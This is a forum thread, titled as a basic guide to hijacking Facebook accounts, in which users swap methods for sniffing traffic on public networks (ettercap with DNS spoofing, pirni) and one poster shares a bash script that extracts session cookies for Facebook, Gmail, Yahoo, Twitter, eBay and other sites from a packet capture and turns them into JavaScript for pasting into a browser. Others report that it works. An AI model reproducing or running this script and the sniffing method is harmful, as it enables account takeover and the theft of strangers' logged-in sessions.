basic : how to hijack facebook account ( cookie injection )

[Pfcdaoe]

So in short. You cant select the user you want to mess with, it is at random?

Please excuse me if im completely wrong but, using pirni only allows packets on your network to be copied because you have to be connected to that network. Meaning your target has to access facebook on your network to be able to copy the network packets and cookies?

[A12danrulz]

Correct

[Markanees]

It can be useful on public network
Use fing to scan for ip ( free from app store ) it also shows the machine details running with this ip
You can also inject these cookies directly from ios by safari JavaScript ( there is a post on it in hacking support section )

[AKUMA]

if the admin can allow, i can past the modified cookie derv .sh that handle javascript.
i prefer to use ettercap with dns_spoof (with lighttpd + phppod) n save pcap for cookie .sh for more result

[Markanees]

if the admin can allow, i can past the modified cookie derv .sh that handle javascript.
i prefer to use ettercap with dns_spoof (with lighttpd + phppod) n save pcap for cookie .sh for more result

i dont see why he would  mind xD

[Ironman]

Go for it AKUMA.

[AKUMA]

#!/bin/bash

# displays cookies
# yay, cookies!

file="/var/mobile/a.pcap"

cookie_file="/var/mobile/cookies.txt"


if [ -f $file ]; then
  cat $file | grep -a "Host: \|Cookie: " | while read line; do
      if [[ `echo "$line" | grep -i "Host: "` != "" ]]; then
        site=$(echo $line | sed 's/Host: //g')
        site=$(echo $site | sed 's/www.//g')
        site=$(echo $site | sed 's/[^a-zA-Z0-9&$@?!.,-:;#%*+=]//g')
        
        # check if this is a site we want the cookie for
        if [[ ! $site == facebook.com ]]     &&
           [[ ! $site == m.facebook.com ]]       &&
           [[ ! $site == *myspace.com ]]     &&
           [[ ! $site == *yahoo.com ]]       &&
           [[ ! $site == gmail.com ]]        &&
           [[ ! $site == *live.com ]]        &&
           [[ ! $site == *facebook.com ]]     &&
           [[ ! $site == *ebay.com ]]        &&
           [[ ! $site == twitter.com ]]; then
          # not what we want
          site=""
        fi
      else
        if [ ! $site == "" ]; then
          cookie=$(echo $line | sed 's/Cookie: //g')


          # split the cookie by delimiter ;
          arr=$(echo $cookie | tr "; " "\n")

         cookdata="${cookdata}\n\n""${site}\n""javascript:"

          # loop through every element of the cookie
          for x in $arr; do
            cname=${x%%=*}
            cdata=${x##*=}
           
cdata=$(echo $cdata | tr -dc '[:print:]')


              # cookie value
              cookdata="${cookdata}""void(document.cookie=\""${cname}"="${cdata}""\"")"";"""    
             
              
              # write new cookie data
              echo -e "$cookdata" > $cookie_file

          done # end of loop through every cookie value

          echo "($site) cookie found."

        fi # end of if ! site=""
        
      fi # end of site-or-cookie check
    
  done # end of loop-through-every-name
  

fi

exit 0

[AKUMA]

the only prob is it duplicates the cookies.
but it dumps all the cookies from 'a.pcap' and adding the javascript to 'cookies.txt' open up safari copy/past n refresh

[Markanees]

worked thanks bro but injectetion in safari using uafaker wont work so
i prefer to use google chrome without Uafaker it will work fine  

[AKUMA]

works fine without uafacker on safari using non mobile version (www.facebook.com)